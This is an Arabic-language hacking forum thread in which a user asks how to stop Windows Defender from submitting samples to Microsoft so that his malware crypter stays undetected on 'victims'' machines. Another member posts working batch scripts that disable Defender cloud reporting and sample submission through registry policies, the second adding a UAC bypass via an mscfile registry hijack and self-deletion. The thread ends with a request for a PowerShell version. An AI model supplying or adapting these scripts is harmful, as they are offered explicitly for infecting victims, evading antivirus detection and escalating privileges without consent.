تمت الإجابة طريقة غلق خاصية ارسال عينة لسيرفرات ميكروسوف للحفاظ على التشفيرة اطول وقت ممكن بدون انكشاف

تم تحميل الصفحة في 1,2081323 ثانية
طريقة غلق خاصية ارسال عينة لسيرفرات ميكروسوف للحفاظ على التشفيرة اطول وقت ممكن بدون انكشاف

EL-MAGIC

Beginner Developer
rank
إنضم
28 أكتوبر 2012
المشاركات
26
الإعجابات
15
النقاط
3
السلام عليكم و رحمه الله و بركاته

لاهل الخبرة هل يوجد طريقة لاطفاء خاصية ارسال عينة لسيرفرات ميكروسوف للويندوز ديفندر لعدم كشف التشفيرة برمجيا عند الضحية؟؟

و اذا لم ينفع.. ما هو الحد الاقصى الذى يتم رفعه لسيرفرات ميكروسوفت عبر هذة الخاصية!! بحيث ان لو ٥٠ ميجا يبقى التلغيم يكون ١٠٠ ميجا مثلا فلا يجوز ارسال عينة منه بسبب الحجم ! هل انا صحيح؟؟ ام يوجد حل اخر برمجيا؟؟

ارجو الافادة اخوانى..
 

natsu

Beginner Developer
rank
إنضم
10 يناير 2015
المشاركات
125
الإعجابات
100
النقاط
43
الإقامة
أ‡أ،أŒأ’أ‡أ†أ‘
تفضل و لكن يجب تشغيل كمسؤل النظام السكربت عبارة عن ملف باتش إحفظه بصيغة CMD.
C#:
@ECHO OFF &SETLOCAL ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f >nul 2>&1
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f >nul 2>&1
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f >nul 2>&1
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f >nul 2>&1
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f >nul 2>&1
 
إنضم
28 أكتوبر 2012
المشاركات
26
الإعجابات
15
النقاط
3
معنى كدة لازم اتخطى ال UAC عشان انفذ الكود عشان ميرسلش القيم و العينات لسيرفرات ميكروسوفت؟ مفيش طريقة لا تحتاج تخطى UAC?

اصل كل ما اعمل تشفيرة و تخطى الدفاع الاستباقى التشفيرة متلحقش و تنكشف و التبليغ يروح و عرف السبب هو ارسال عينات لسيرفرات ميكروسوف فبيتم كشف التلغيمة بسرعة و الاقى الضحايا بيروحو..
 
الإعجابات: natsu
إنضم
28 أكتوبر 2012
المشاركات
26
الإعجابات
15
النقاط
3
مرادك هنا
كود تخطي صلاحيات الادمين UAC
إذا لم تنجح حاول إستبدال eventvwr.exe ب CompMgmtLauncher.exe
هناك تخطيات عديدة خاصة ويندوز 10
سؤال اخير اخى العزير بارك الله فيك يعطيك الف عافية


كود الباتش اول واحد دة كافى انو ميرسلش تشفيرتى لميكروسوف لعدم كشفها نهائى ؟؟ ولا هحتاج حاجة زيادة زى المرجع دا ؟ و هل هحتاج ان الضحية جهازو يعمل ريسترت و لا بعد تنفيذ الاكواد هيتمم منع ارسال القيم و العينات لسيرفرات ميكروسوف فورا !! و من ثم تشغيل تشفرتى بسلام !! من غير ارسال قيمها و لا عينة منها ؟؟

[Windows Tip] How to Disable Windows Defender Permanently - AskVG
 
الإعجابات: natsu
إنضم
28 أكتوبر 2012
المشاركات
26
الإعجابات
15
النقاط
3

natsu

Beginner Developer
rank
إنضم
10 يناير 2015
المشاركات
125
الإعجابات
100
النقاط
43
الإقامة
أ‡أ،أŒأ’أ‡أ†أ‘
تفضل
كود:
@ECHO off &SETLOCAL ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION

call :IsAdmin

:IsAdmin
REG query "HKU\S-1-5-19\Environment"
If Not %ERRORLEVEL% EQU 0 (
    CALL :NinjaUAC
    Exit
) ELSE (
    CALL :DEFENDERSPY
)
Cls
goto:eof

:WAIT
PING -n %1 127.0.0.1 >NUL 2>&1
GOTO :eof

:NinjaUAC
REG ADD "HKCU\Software\Classes\mscfile\shell\open\command" /ve /d %~dpnx0 /f >NUL 2>&1
CALL :WAIT 1
start "" %Systemroot%\System32\mmc.exe "%Systemroot%\System32\compmgmt.msc" /s >NUL 2>&1

:DEFENDERSPY
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f >nul 2>&1
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f >nul 2>&1
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f >nul 2>&1
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f >nul 2>&1
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f >nul 2>&1
REG DELETE "HKCU\Software\Classes\mscfile" /f >NUL 2>&1
:loop
del "%~dpnx0"
if exist "%~dpnx0" goto loop
 

natsu

Beginner Developer
rank
إنضم
10 يناير 2015
المشاركات
125
الإعجابات
100
النقاط
43
الإقامة
أ‡أ،أŒأ’أ‡أ†أ‘
سؤال اخير اخى العزير بارك الله فيك يعطيك الف عافية


كود الباتش اول واحد دة كافى انو ميرسلش تشفيرتى لميكروسوف لعدم كشفها نهائى ؟؟ ولا هحتاج حاجة زيادة زى المرجع دا ؟ و هل هحتاج ان الضحية جهازو يعمل ريسترت و لا بعد تنفيذ الاكواد هيتمم منع ارسال القيم و العينات لسيرفرات ميكروسوف فورا !! و من ثم تشغيل تشفرتى بسلام !! من غير ارسال قيمها و لا عينة منها ؟؟

[Windows Tip] How to Disable Windows Defender Permanently - AskVG
طبعا بعد ريسترت
 
إنضم
28 أكتوبر 2012
المشاركات
26
الإعجابات
15
النقاط
3
تفضل
كود:
@ECHO off &SETLOCAL ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION

call :IsAdmin

:IsAdmin
REG query "HKU\S-1-5-19\Environment"
If Not %ERRORLEVEL% EQU 0 (
    CALL :NinjaUAC
    Exit
) ELSE (
    CALL :DEFENDERSPY
)
Cls
goto:eof

:WAIT
PING -n %1 127.0.0.1 >NUL 2>&1
GOTO :eof

:NinjaUAC
REG ADD "HKCU\Software\Classes\mscfile\shell\open\command" /ve /d %~dpnx0 /f >NUL 2>&1
CALL :WAIT 1
start "" %Systemroot%\System32\mmc.exe "%Systemroot%\System32\compmgmt.msc" /s >NUL 2>&1

:DEFENDERSPY
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f >nul 2>&1
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f >nul 2>&1
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f >nul 2>&1
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f >nul 2>&1
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f >nul 2>&1
REG DELETE "HKCU\Software\Classes\mscfile" /f >NUL 2>&1
:loop
del "%~dpnx0"
if exist "%~dpnx0" goto loop
اخى بيقولى

Access is Denied
 
إنضم
28 أكتوبر 2012
المشاركات
26
الإعجابات
15
النقاط
3
اخى لو تدينى نفس الكود بتاع غلق خواص ارسال العينات الاولانى على شكل فانكشن بالبوشيل بامتداد ps1 انا عندى طريقة للتخطى ال UAC بس محتاج الكود تانى على شكل فانكشن بالبورشيل بامتداد ps1
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل